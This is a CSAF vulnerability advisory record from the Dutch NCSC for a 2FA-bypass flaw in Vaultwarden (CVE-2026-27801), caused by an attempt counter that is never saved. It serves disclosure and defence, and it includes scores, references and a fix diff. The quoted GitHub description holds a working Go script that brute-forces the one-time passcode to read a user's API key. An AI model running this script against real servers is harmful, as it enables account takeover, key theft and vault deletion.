{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-27801",
        "tracking": {
            "current_release_date": "2026-03-23T03:41:41.935272Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-27801",
            "initial_release_date": "2026-03-04T20:39:48.603554Z",
            "revision_history": [
                {
                    "date": "2026-03-04T20:39:48.603554Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-04T20:39:50.425055Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-04T21:38:33.093076Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (1).| CWES updated (1)."
                },
                {
                    "date": "2026-03-04T21:38:41.366353Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-04T22:25:29.508683Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (1).| CWES updated (1)."
                },
                {
                    "date": "2026-03-04T22:25:32.887070Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-05T11:06:15.455226Z",
                    "number": "7",
                    "summary": "Source created.| CVE status created. (valid)| Products created (1).| References created (6)."
                },
                {
                    "date": "2026-03-05T11:06:17.764389Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-05T12:30:37.645191Z",
                    "number": "9",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1).| Vendor_assessment created."
                },
                {
                    "date": "2026-03-05T12:30:39.428322Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-05T14:14:09.377696Z",
                    "number": "11",
                    "summary": "Source created.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-05T14:14:15.149106Z",
                    "number": "12",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-05T16:16:05.774927Z",
                    "number": "13",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-05T16:39:47.687182Z",
                    "number": "14",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-06T20:26:20.114430Z",
                    "number": "15",
                    "summary": "CVSS created.| Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-06T20:26:24.471617Z",
                    "number": "16",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T09:39:45.830317Z",
                    "number": "17",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-20T09:39:48.606180Z",
                    "number": "18",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "18"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<1.35.0",
                                "product": {
                                    "name": "vers:unknown/<1.35.0",
                                    "product_id": "CSAFPID-5761788"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Vaultwarden"
                    }
                ],
                "category": "vendor",
                "name": "Open Source"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<1.35.0",
                                "product": {
                                    "name": "vers:unknown/<1.35.0",
                                    "product_id": "CSAFPID-5759381",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:dani-garcia:vaultwarden:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "vaultwarden"
                    }
                ],
                "category": "vendor",
                "name": "dani-garcia"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-27801",
            "cwe": {
                "id": "CWE-307",
                "name": "Improper Restriction of Excessive Authentication Attempts"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "### Summary\n\nVaultwarden v1.34.3 and prior are susceptible to a 2FA bypass when performing protected actions. An attacker who gains authenticated access to a user&rsquo;s account can exploit this bypass to perform protected actions such as accessing the user's API key or deleting the user's vault and organisations the user is an admin/owner of.\n\nNote that \n\n\n### Details\n\nWithin Vaultwarden, the `PasswordOrOtpData` struct is used to gate certain protected actions such as account deletion behind a 2FA validation. This validation requires the user to either re-enter their master password, or to enter a one-time passcode sent to their email address.\n\nBy default, the one-time passcode is comprised of six digits, and the expiry time for each token is ten minutes. The validation of this one-time passcode is performed by the following function:\n\n```rust\npub async fn validate_protected_action_otp(\n    otp: &str,\n    user_id: &UserId,\n    delete_if_valid: bool,\n    conn: &mut DbConn,\n) -> EmptyResult {\n    let pa = TwoFactor::find_by_user_and_type(user_id, TwoFactorType::ProtectedActions as i32, conn)\n        .await\n        .map_res(\"Protected action token not found, try sending the code again or restart the process\")?;\n    let mut pa_data = ProtectedActionData::from_json(&pa.data)?;\n\n    pa_data.add_attempt();\n    // Delete the token after x attempts if it has been used too many times\n    // We use the 6, which should be more then enough for invalid attempts and multiple valid checks\n    if pa_data.attempts > 6 {\n        pa.delete(conn).await?;\n        err!(\"Token has expired\")\n    }\n\n    // Check if the token has expired (Using the email 2fa expiration time)\n    let date =\n        DateTime::from_timestamp(pa_data.token_sent, 0).expect(\"Protected Action token timestamp invalid.\").naive_utc();\n    let max_time = CONFIG.email_expiration_time() as i64;\n    if date + 
TimeDelta::try_seconds(max_time).unwrap() < Utc::now().naive_utc() {\n        pa.delete(conn).await?;\n        err!(\"Token has expired\")\n    }\n\n    if !crypto::ct_eq(&pa_data.token, otp) {\n        pa.save(conn).await?;\n        err!(\"Token is invalid\")\n    }\n\n    if delete_if_valid {\n        pa.delete(conn).await?;\n    }\n\n    Ok(())\n}\n```\n\nSince the one-time passcode is only six digits long, it has significantly less entropy than a typical password or secret key. Hence, Vaultwarden attempts to prevent brute-force attacks against this passcode by enforcing a rate limit of 6 attempts per code. However, the number of attempts made by the user is not persisted correctly.\n\nIn the `validate_protected_action_otp` function, Vaultwarden first reads the OTP data from a JSON blob stored in `pa.data`. The resulting `ProtectedActionData` structure is then a deserialised copy of the underlying JSON value.\n\n```rust\nlet mut pa_data = ProtectedActionData::from_json(&pa.data)?;\n```\n\nNext, Vaultwarden calls `pa_data.add_attempt()` in order to increment the number of attempts made by one. This increments the attempt count on the local structure, but does not modify the value of `pa.data`.\n\n```rust\npub fn add_attempt(&mut self) {\n    self.attempts += 1;\n}\n```\n\nFinally, if the OTP validation fails, Vaultwarden attempts to persist the updated attempt count by calling `pa.save(conn)`. However, since only a copy of `pa.data` was modified, the persisted attempt count remains at zero.\n\nThe probability of a successful brute force depends on the OTP token length, the OTP expiry duration, and the request throughput. Since each request issued by the attacker does not depend on any previous requests, network latency is not a factor. The bottleneck, then, will likely be either the attacker&rsquo;s network bandwidth or Vaultwarden&rsquo;s request processing throughput. 
From local testing, rates of up to 2500 requests per second were achievable, which successfully brute-forced the OTP in 3 minutes.\n\nIf the attacker&rsquo;s request throughput is low, they can also make repeated requests to `/api/accounts/request-otp` to generate new tokens. Their probability of success is then\n\n```math\n1 - \\left(1 - \\frac{R * T}{10^L}\\right)^n,\n```\n\nwhere $R$ is the number of requests per second, $T$ is the token expiry time in seconds, $L$ is the number of digits in the OTP code, and $n$ is the number of OTP tokens requested.\n\n\n<a id=\"orgca0bfe5\"></a>\n\n### Proof of Concept\n\nThe easiest method of demonstrating this vulnerability is by making an (authenticated) request to the `/api/accounts/request-otp` endpoint to generate an OTP, and then repeatedly sending invalid guesses to `/api/accounts/verify-otp`. After six guesses, Vaultwarden will still reply `\"Token is invalid\"` in response to an incorrect guess, rather than `\"Token has expired\"` as expected when the rate limit is exceeded. 
Upon entering the correct OTP, the code will still validate despite more than six guesses being made.\n\nFor a more practical example, the following Go script will brute force the OTP in order to read the user&rsquo;s API key.\n\n```go\npackage main\n\nimport (\n\t\"bytes\"\n\t\"context\"\n\t\"crypto/tls\"\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"io\"\n\t\"log\"\n\t\"net/http\"\n\t\"sync\"\n\t\"sync/atomic\"\n\t\"time\"\n)\n\nconst (\n\thost        = \"https://10.10.0.1:8000\"\n\tjwtToken    = \"...\"\n\tconcurrency = 100\n\ttotalOtps   = 1000000\n)\n\ntype Brute struct {\n\tclient *http.Client\n}\n\nfunc NewBrute() *Brute {\n\ttr := &http.Transport{\n\t\tTLSClientConfig: &tls.Config{InsecureSkipVerify: true},\n\t}\n\treturn &Brute{\n\t\tclient: &http.Client{Transport: tr},\n\t}\n}\n\nfunc (v *Brute) RequestOTP() error {\n\treq, err := http.NewRequest(\"POST\", host+\"/api/accounts/request-otp\", nil)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed to create OTP request: %w\", err)\n\t}\n\treq.Header.Set(\"Authorization\", \"Bearer \"+jwtToken)\n\n\tresp, err := v.client.Do(req)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed to send OTP request: %w\", err)\n\t}\n\tdefer resp.Body.Close()\n\n\tif resp.StatusCode != http.StatusOK && resp.StatusCode != http.StatusBadRequest {\n\t\treturn fmt.Errorf(\"unexpected status code for OTP request: %d\", resp.StatusCode)\n\t}\n\n\tfmt.Println(\"Requested OTP successfully\")\n\treturn nil\n}\n\nfunc (v *Brute) GetAPIKey(ctx context.Context, otp string) (bool, error) {\n\tpayload, _ := json.Marshal(map[string]string{\"otp\": otp})\n\tbody := bytes.NewBuffer(payload)\n\n\treq, err := http.NewRequestWithContext(ctx, \"POST\", host+\"/api/accounts/api-key\", body)\n\tif err != nil {\n\t\treturn false, fmt.Errorf(\"failed to create verification request: %w\", err)\n\t}\n\treq.Header.Set(\"Authorization\", \"Bearer \"+jwtToken)\n\treq.Header.Set(\"Content-Type\", \"application/json\")\n\n\tresp, err := v.client.Do(req)\n\tif err 
!= nil {\n\t\treturn false, err\n\t}\n\tdefer resp.Body.Close()\n\n\tswitch resp.StatusCode {\n\tcase http.StatusOK:\n\t\tbody, err := io.ReadAll(resp.Body)\n\t\tif err == nil {\n\t\t\tfmt.Println(\"\\n-----\\n\" + string(body) + \"\\n-----\\n\")\n\t\t}\n\t\treturn true, nil\n\tcase http.StatusBadRequest:\n\t\treturn false, nil\n\tdefault:\n\t\treturn false, fmt.Errorf(\"unexpected status code for verification: %d\", resp.StatusCode)\n\t}\n}\n\nfunc progressTracker(ctx context.Context, counter *uint64, start time.Time) {\n\tticker := time.NewTicker(300 * time.Millisecond)\n\tdefer ticker.Stop()\n\n\tfor {\n\t\tselect {\n\t\tcase <-ctx.Done():\n\t\t\tdone := atomic.LoadUint64(counter)\n\t\t\telapsed := time.Since(start).Seconds()\n\t\t\trps := 0.0\n\t\t\tif elapsed > 0 {\n\t\t\t\trps = float64(done) / elapsed\n\t\t\t}\n\t\t\tfmt.Printf(\"\\rprogress: %d/%d (%.2f%%) | %.2f req/sec | elapsed: %.1fs\\n\", done, totalOtps, float64(done)/float64(totalOtps)*100, rps, elapsed)\n\t\t\treturn\n\t\tcase <-ticker.C:\n\t\t\tdone := atomic.LoadUint64(counter)\n\t\t\telapsed := time.Since(start).Seconds()\n\t\t\trps := 0.0\n\t\t\tif elapsed > 0 {\n\t\t\t\trps = float64(done) / elapsed\n\t\t\t}\n\t\t\tfmt.Printf(\"\\rprogress: %d/%d (%.2f%%) | %.2f req/sec | elapsed: %.1fs\", done, totalOtps, float64(done)/float64(totalOtps)*100, rps, elapsed)\n\t\t}\n\t}\n}\n\nfunc main() {\n\tbrute := NewBrute()\n\tif err := brute.RequestOTP(); err != nil {\n\t\tlog.Fatalf(\"Error: %v\", err)\n\t}\n\n\tctx, cancel := context.WithCancel(context.Background())\n\tdefer cancel()\n\n\tvar wg sync.WaitGroup\n\tvar counter uint64\n\tstartTime := time.Now()\n\n\tgo progressTracker(ctx, &counter, startTime)\n\n\tchunkSize := totalOtps / concurrency\n\tfor i := 0; i < concurrency; i++ {\n\t\tstart := i * chunkSize\n\t\tend := start + chunkSize\n\t\tif i == concurrency-1 {\n\t\t\tend = totalOtps\n\t\t}\n\n\t\twg.Add(1)\n\t\tgo func(s, e int) {\n\t\t\tdefer wg.Done()\n\t\t\tfor otpNum := s; otpNum < e; 
otpNum++ {\n\t\t\t\tselect {\n\t\t\t\tcase <-ctx.Done():\n\t\t\t\t\treturn\n\t\t\t\tdefault:\n\t\t\t\t}\n\n\t\t\t\totpStr := fmt.Sprintf(\"%06d\", otpNum)\n\t\t\t\tsuccess, err := brute.GetAPIKey(ctx, otpStr)\n\n\t\t\t\tatomic.AddUint64(&counter, 1)\n\n\t\t\t\tif err != nil {\n\t\t\t\t\tselect {\n\t\t\t\t\tcase <-ctx.Done():\n\t\t\t\t\tdefault:\n\t\t\t\t\t\tlog.Printf(\"\\nError verifying OTP %s: %v\", otpStr, err)\n\t\t\t\t\t\tcancel()\n\t\t\t\t\t}\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\tif success {\n\t\t\t\t\tfmt.Printf(\"\\n\\nSuccess: Found OTP = %s\\n\", otpStr)\n\t\t\t\t\tcancel()\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}(start, end)\n\t}\n\n\twg.Wait()\n\tfmt.Println(\"Brute-force attempt finished.\")\n}\n```\n<img width=\"997\" height=\"301\" alt=\"image\" src=\"https://github.com/user-attachments/assets/61486bb6-302b-4edb-87b7-d229bbd33380\" />\n\n### Impact\n\nAn attacker who gains access to a user&rsquo;s account can exploit this bypass to perform protected actions such as accessing the user&rsquo;s API key or deleting the user&rsquo;s accounts and organisations.\n\n### Remediation\n\nThe simplest fix is to ensure the updated number of attempts is persisted by calling `pa.data = pa_data.to_json()` before calling `pa.save(conn)`. However this still leaves open the possibility of an attacker requesting an OTP code, exhausting their six attempts and then requesting a new code to try. 
This attack succeeds with probability\n\n```math\n1 - \\left(1 - \\frac{6}{10^L}\\right)^n,\n```\n\nwhich becomes non-negligible as $n$ increases.\n\nTherefore, the best approach might be to enforce a delay like this, to ensure that all rate limits are ultimately tied back to time:\n\n```diff\ndiff --git a/src/api/core/two_factor/protected_actions.rs b/src/api/core/two_factor/protected_actions.rs\nindex 5e4a65be..aa9cb8f6 100644\n--- a/src/api/core/two_factor/protected_actions.rs\n+++ b/src/api/core/two_factor/protected_actions.rs\n@@ -66,7 +66,18 @@ async fn request_otp(headers: Headers, mut conn: DbConn) -> EmptyResult {\n     if let Some(pa) =\n         TwoFactor::find_by_user_and_type(&user.uuid, TwoFactorType::ProtectedActions as i32, &mut conn).await\n     {\n-        pa.delete(&mut conn).await?;\n+        let pa_data = ProtectedActionData::from_json(&pa.data)?;\n+        let token_sent = DateTime::from_timestamp(pa_data.token_sent, 0)\n+            .expect(\"Protected Action token timestamp invalid\")\n+            .naive_utc();\n+        let elapsed = Utc::now().naive_utc() - token_sent;\n+        let delay = TimeDelta::seconds(20);\n+\n+        if elapsed < delay {\n+            err!(format!(\"Please wait {} seconds before requesting another code.\", (delay - elapsed).num_seconds()));\n+        } else {\n+            pa.delete(&mut conn).await?;\n+        }\n     }\n\n     let generated_token = crypto::generate_email_token(CONFIG.email_token_size());\n@@ -131,6 +142,7 @@ pub async fn validate_protected_action_otp(\n     }\n\n     if !crypto::ct_eq(&pa_data.token, otp) {\n+        pa.data = pa_data.to_json();\n         pa.save(conn).await?;\n         err!(\"Token is invalid\")\n     }\n```",
                    "title": "github - https://github.com/advisories/GHSA-v6pg-v89r-w8wr"
                },
                {
                    "category": "description",
                    "text": "Vaultwarden is an unofficial Bitwarden compatible server written in Rust, formerly known as bitwarden_rs. Vaultwarden versions 1.34.3 and prior are susceptible to a 2FA bypass when performing protected actions. An attacker who gains authenticated access to a user’s account can exploit this bypass to perform protected actions such as accessing the user’s API key or deleting the user’s vault and organisations the user is an admin/owner of . This issue has been patched in version 1.35.0.",
                    "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-27801"
                },
                {
                    "category": "description",
                    "text": "Vaultwarden is an unofficial Bitwarden compatible server written in Rust, formerly known as bitwarden_rs. Vaultwarden versions 1.34.3 and prior are susceptible to a 2FA bypass when performing protected actions. An attacker who gains authenticated access to a user’s account can exploit this bypass to perform protected actions such as accessing the user’s API key or deleting the user’s vault and organisations the user is an admin/owner of . This issue has been patched in version 1.35.0.",
                    "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-27801"
                },
                {
                    "category": "description",
                    "text": "No description is available for this CVE.\nThis MODERATE vulnerability allows an authenticated attacker to bypass 2FA for protected actions via faulty rate limiting. Exploitation requires network access and low privileges (valid account). Impact includes high confidentiality loss (API key exposure), high integrity loss (vault/org deletion), and high availability loss (data destruction). Red Hat ships Vaultwarden in its community products.",
                    "title": "redhat - https://access.redhat.com/security/cve/CVE-2026-27801"
                },
                {
                    "category": "other",
                    "text": "0.00031",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N",
                    "title": "CVSSV4"
                },
                {
                    "category": "other",
                    "text": "6.0",
                    "title": "CVSSV4 base score"
                },
                {
                    "category": "other",
                    "text": "4.1",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "There is product data available from source Certbundde",
                    "title": "NCSC Score top increasing factors"
                },
                {
                    "category": "other",
                    "text": "The value of the most recent EPSS score, There is exploit data available from source Nvd, Is related to (a version of) an uncommon product",
                    "title": "NCSC Score top decreasing factors"
                },
                {
                    "category": "details",
                    "text": "Severity: 2\n",
                    "title": "Vendor assessment"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5759381",
                    "CSAFPID-5761788"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://github.com/advisories/GHSA-v6pg-v89r-w8wr"
                },
                {
                    "category": "external",
                    "summary": "Source raw - github",
                    "url": "https://api.github.com/advisories/GHSA-v6pg-v89r-w8wr"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-27801"
                },
                {
                    "category": "external",
                    "summary": "Source raw - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/27xxx/CVE-2026-27801.json"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27801"
                },
                {
                    "category": "external",
                    "summary": "Source raw - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-27801"
                },
                {
                    "category": "external",
                    "summary": "Source - certbundde",
                    "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0594.json"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-27801"
                },
                {
                    "category": "external",
                    "summary": "Source raw - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27801.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27801"
                },
                {
                    "category": "external",
                    "summary": "Source raw - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; redhat",
                    "url": "https://github.com/dani-garcia/vaultwarden/security/advisories/GHSA-v6pg-v89r-w8wr"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde; github",
                    "url": "https://github.com/advisories/GHSA-v6pg-v89r-w8wr"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0594.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0594"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://github.com/advisories/GHSA-h4hq-rgvh-wh27"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://github.com/advisories/GHSA-r32r-j5jq-3w4m"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://github.com/advisories/GHSA-w9f8-m526-h7fh"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-27801"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; redhat",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27801"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                        "baseScore": 8.8,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-5759381",
                        "CSAFPID-5761788"
                    ]
                }
            ],
            "title": "CVE-2026-27801"
        }
    ]
}